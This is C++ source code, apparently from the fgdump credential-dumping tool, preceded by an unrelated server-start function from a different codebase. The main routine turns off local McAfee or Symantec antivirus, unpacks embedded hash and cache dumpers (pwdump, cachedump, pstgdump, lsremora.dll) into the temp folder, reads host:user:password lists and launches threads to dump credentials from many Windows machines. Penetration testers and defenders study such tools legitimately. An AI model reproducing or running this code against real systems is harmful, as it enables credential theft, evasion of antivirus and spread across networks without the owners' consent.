bool CWRequest::StartServer(string sServerPath, int iTimeoutMS, string* pSessionID, string* pErrorMessage)
{
if(sServerPath == "")
{
if(pErrorMessage != NULL) *pErrorMessage = "Server application not specified.";
return false;
}
if(!FileExists(sServerPath))
{
if(pErrorMessage != NULL) *pErrorMessage = "Server application not found.";
return false;
}
// create session ID
string session_id = CreateSessionID();
// start server
string args = "-s " + session_id;
if(!Execute(sServerPath, args, 0, pErrorMessage))
return false;
if(!IsServerRunning(session_id, iTimeoutMS, pErrorMessage))
return false;
*pSessionID = session_id;
return true;
}
int FGDump::Run()
{
ResourceLoader objResPWDump, objResPWService, objResLSAExt, objResFGExec;
ResourceLoader objLSADump, objResCacheDump, objResPStgDump;
ResourceLoader objResPWService64, objResLSAExt64, objResCacheDump64;
size_t nLen;
FILE* fileInput = NULL;
char szPwdTemp[101];
char COLON[] = ":";
char* szSessionID = NULL;
char* szFailedLogName = NULL;
char* szDefaultLogName = NULL;
GetTempPath(MAX_PATH, lpszTempPath);
//Log.ReportError(DEBUG, "Using a temp path of %s\n", lpszTempPath);
if (((lpszServer != NULL || *lpszSourceFile != NULL) && lpszUser == NULL) && !bUsePerHostCreds)
{
Log.ReportError(CRITICAL, "ERROR: you must specify a server and username!\n");
ExitApp(1);
}
if (lpszServer == NULL && *lpszSourceFile == NULL)
{
// Local pwdump run
bRunLocal = true;
lpszServer = "127.0.0.1";
}
if (lpszSourceFile == NULL && bUsePerHostCreds)
{
Log.ReportError(CRITICAL, "ERROR: you must specify a filename to use!\n");
ExitApp(1);
}
if (!bRunLocal && lpszPassword == NULL && !bUsePerHostCreds)
{
// Prompt the user for a password
memset(szPwdTemp, 0, 101);
printf("Please specify the password to use: ");
int i = 0;
char pwBuf[100];
char c = 0;
memset(pwBuf, 0, 100);
while(c != '\r' && i < 100)
{
c = _getch();
pwBuf[i++] = c;
_putch('*');
}
pwBuf[--i] = 0;
_putch('\r');
_putch('\n');
memcpy(szPwdTemp, pwBuf, 100);
SetPassword(szPwdTemp);
}
if ((bRunCachedump == false && bRunPwdump == false) && bFullRun == true)
{
Log.ReportError(CRITICAL, "ERROR: You cannot specify -c *and* -w, unless you use -t\n");
ExitApp(1);
}
// Ready to run, grab a session ID
szSessionID = CreateSessionID();
if (szSessionID == NULL)
{
Log.ReportError(CRITICAL, "ERROR: Could not get a session ID. This is very odd...I'd better quit.\n");
ExitApp(1);
}
size_t nFailedLogNameLength = strlen(szSessionID) + strlen(FAILED_FILE_EXT) + 1;
szFailedLogName = (char*)malloc(nFailedLogNameLength);
memset(szFailedLogName, 0, nFailedLogNameLength);
strncpy(szFailedLogName, szSessionID, strlen(szSessionID));
strncat(szFailedLogName, FAILED_FILE_EXT, strlen(FAILED_FILE_EXT));
LogFailed.SetLogFile(szFailedLogName);
// If we haven't overwritten the log file path, set up the default
if (strlen(Log.GetLogFile()) == 0)
{
size_t nLogNameLength = strlen(szSessionID) + strlen(DEFAULT_LOG_FILE_EXT) + 1;
szDefaultLogName = (char*)malloc(nLogNameLength);
memset(szDefaultLogName, 0, nLogNameLength);
strncpy(szDefaultLogName, szSessionID, strlen(szSessionID));
strncat(szDefaultLogName, DEFAULT_LOG_FILE_EXT, strlen(DEFAULT_LOG_FILE_EXT));
Log.SetLogFile(szDefaultLogName);
}
Log.SetWriteToFile(true);
Log.ReportError(REGULAR_OUTPUT, "--- Session ID: %s ---\n", szSessionID);
// Get the temporary directory for use in unpacking the files
memset(lpszPWServicePath, 0, MAX_PATH + 15);
memset(lpszPWDumpPath, 0, MAX_PATH + 15);
memset(lpszLSAExtPath, 0, MAX_PATH + 15);
memset(lpszFGExecPath, 0, MAX_PATH + 15);
memset(lpszCacheDumpPath, 0, MAX_PATH + 15);
memset(lpszPStoragePath, 0, MAX_PATH + 15);
memset(lpszPWService64Path, 0, MAX_PATH + 15);
memset(lpszLSAExt64Path, 0, MAX_PATH + 15);
memset(lpszCacheDump64Path, 0, MAX_PATH + 15);
_snprintf(lpszPWServicePath, MAX_PATH + 15, "%s%s", lpszTempPath, "servpw.exe");
_snprintf(lpszPWDumpPath, MAX_PATH + 15, "%s%s", lpszTempPath, "pwdump.exe");
_snprintf(lpszLSAExtPath, MAX_PATH + 15, "%s%s", lpszTempPath, "lsremora.dll");
_snprintf(lpszFGExecPath, MAX_PATH + 15, "%s%s", lpszTempPath, "fgexec.exe");
_snprintf(lpszCacheDumpPath, MAX_PATH + 15, "%s%s", lpszTempPath, "cachedump.exe");
_snprintf(lpszPStoragePath, MAX_PATH + 15, "%s%s", lpszTempPath, "pstgdump.exe");
_snprintf(lpszPWService64Path, MAX_PATH + 15, "%s%s", lpszTempPath, "servpw64.exe");
_snprintf(lpszLSAExt64Path, MAX_PATH + 15, "%s%s", lpszTempPath, "lsremora64.dll");
_snprintf(lpszCacheDump64Path, MAX_PATH + 15, "%s%s", lpszTempPath, "cachedump64.exe");
// If antivirus is running locally, turn it off, since it may disrupt the storage
// of the worker files locally. Only do this if the user hasn't disabled it.
if (!bSkipAVCheck)
{
if (objMcafee.IsServiceInstalled("127.0.0.1"))
{
Log.ReportError(INFO, "McAfee detected locally\n");
if (objMcafee.GetServiceState("127.0.0.1") == AV_STARTED)
{
objMcafee.StopService("127.0.0.1");
bDisabledAV = true;
}
}
else if (objSymantec.IsServiceInstalled("127.0.0.1"))
{
Log.ReportError(INFO, "Symantec detected locally\n");
if (objSymantec.GetServiceState("127.0.0.1") == AV_STARTED)
{
objSymantec.StopService("127.0.0.1");
bDisabledAV = true;
}
}
}
if (!objResPWDump.UnpackResource(IDR_PWDUMP, lpszPWDumpPath))
ExitApp(1);
if (!objResPWService.UnpackResource(IDR_PWSERVICE, lpszPWServicePath))
ExitApp(1);
if (!objResLSAExt.UnpackResource(IDR_LSAEXT, lpszLSAExtPath))
ExitApp(1);
if (!objResFGExec.UnpackResource(IDR_FGEXEC, lpszFGExecPath))
ExitApp(1);
if (!objResCacheDump.UnpackResource(IDR_CACHEDUMP, lpszCacheDumpPath))
ExitApp(1);
if (!objResPStgDump.UnpackResource(IDR_PSTGDUMP, lpszPStoragePath))
ExitApp(1);
if (!objResPWService64.UnpackResource(IDR_PWSERVICE64, lpszPWService64Path))
ExitApp(1);
if (!objResLSAExt64.UnpackResource(IDR_LSAEXT64, lpszLSAExt64Path))
ExitApp(1);
if (!objResCacheDump64.UnpackResource(IDR_CACHEDUMP64, lpszCacheDump64Path))
ExitApp(1);
// Set up the thread pool
CreateThreadPool();
if (strlen(lpszSourceFile) > 0)
{
// User specified a file containing hosts to run against
char szLine[200];
size_t nPos;
fileInput = fopen(lpszSourceFile, "r");
if (fileInput == NULL)
{
Log.ReportError(CRITICAL, "The file %s was not found. Sorry, no potato.\n", lpszSourceFile);
ExitApp(-1);
}
fseek(fileInput, 0, SEEK_SET);
// Read in data a line at a time and trim it
while (fgets(szLine, 200, fileInput) != NULL)
{
if ((nPos = strcspn(szLine, "\r\n")) >= 0)
{
szLine[nPos] = '\0';
}
if (strlen(szLine) > 0)
{
if (lpszServer != NULL)
delete [] lpszServer;
if (bUsePerHostCreds)
{
char* szResult;
if (lpszPassword != NULL)
delete [] lpszPassword;
if (lpszUser != NULL)
delete [] lpszUser;
// The line has to be broken up by ':' characters as host:user:pwd
szResult = strtok(szLine, COLON);
if (szResult == NULL)
{
Log.ReportError(CRITICAL, "The line '%s' is not of the correct 'host:user:pwd' format, skipping this entry\n", szLine);
continue;
}
// Host name
nLen = strlen(szResult);
lpszServer = new char[nLen + 1];
memset(lpszServer, 0, nLen + 1);
strncpy(lpszServer, szResult, nLen);
szResult = strtok(NULL, COLON);
if (szResult == NULL)
{
Log.ReportError(CRITICAL, "The line '%s' is not of the correct 'host:user:pwd' format, skipping this entry\n", szLine);
continue;
}
// Username
nLen = strlen(szResult);
lpszUser = new char[nLen + 1];
memset(lpszUser, 0, nLen + 1);
strncpy(lpszUser, szResult, nLen);
szResult = strtok(NULL, COLON);
if (szResult == NULL)
{
Log.ReportError(CRITICAL, "The line '%s' is not of the correct 'host:user:pwd' format, skipping this entry\n", szLine);
continue;
}
// Password
nLen = strlen(szResult);
lpszPassword = new char[nLen + 1];
memset(lpszPassword, 0, nLen + 1);
strncpy(lpszPassword, szResult, nLen);
}
else
{
nLen = strlen(szLine);
lpszServer = new char[nLen + 1];
memset(lpszServer, 0, nLen + 1);
strncpy(lpszServer, szLine, nLen);
}
DispatchWorkerThread(lpszServer, lpszUser, lpszPassword);
}
}
// Was there an error or end-of-file?
if (!feof(fileInput))
{
Log.ReportError(CRITICAL, "Unexpected error reading from the file (error %d)\n", GetLastError());
fclose(fileInput);
ExitApp(-1);
}
fclose(fileInput);
}
else
{
DispatchWorkerThread(lpszServer, lpszUser, lpszPassword);
}
WaitForAllThreadsToFinish();
Log.ReportError(CRITICAL, "\n-----Summary-----\n\n");
Log.ReportError(CRITICAL, "Failed servers:\n");
char* szTemp = arrFailed.GetFirstString();
if (szTemp == NULL)
Log.ReportError(CRITICAL, "NONE\n");
else
{
while (szTemp != NULL)
{
Log.ReportError(CRITICAL, "%s\n", szTemp);
szTemp = arrFailed.GetNextString();
}
}
Log.ReportError(CRITICAL, "\nSuccessful servers:\n");
szTemp = arrSuccess.GetFirstString();
if (szTemp == NULL)
Log.ReportError(CRITICAL, "NONE\n");
else
{
while (szTemp != NULL)
{
Log.ReportError(CRITICAL, "%s\n", szTemp);
szTemp = arrSuccess.GetNextString();
}
}
if (pThreadData != NULL)
delete [] pThreadData;
if (bDisabledAV)
{
// Turn it back on
if (objMcafee.IsServiceInstalled("127.0.0.1"))
{
if (objMcafee.GetServiceState("127.0.0.1") == AV_STOPPED)
{
objMcafee.StartService("127.0.0.1");
bDisabledAV = false;
}
}
else if (objSymantec.IsServiceInstalled("127.0.0.1"))
{
if (objSymantec.GetServiceState("127.0.0.1") == AV_STOPPED)
{
objSymantec.StartService("127.0.0.1");
bDisabledAV = false;
}
}
}
Log.ReportError(CRITICAL, "\nTotal failed: %d\n", nFailures);
Log.ReportError(CRITICAL, "Total successful: %d\n", nSuccesses);
if (szSessionID != NULL)
{
free(szSessionID);
szSessionID = NULL;
}
if (szFailedLogName != NULL)
{
free(szFailedLogName);
szFailedLogName = NULL;
}
if (szDefaultLogName != NULL)
{
free(szDefaultLogName);
szDefaultLogName = NULL;
}
return 0;
}
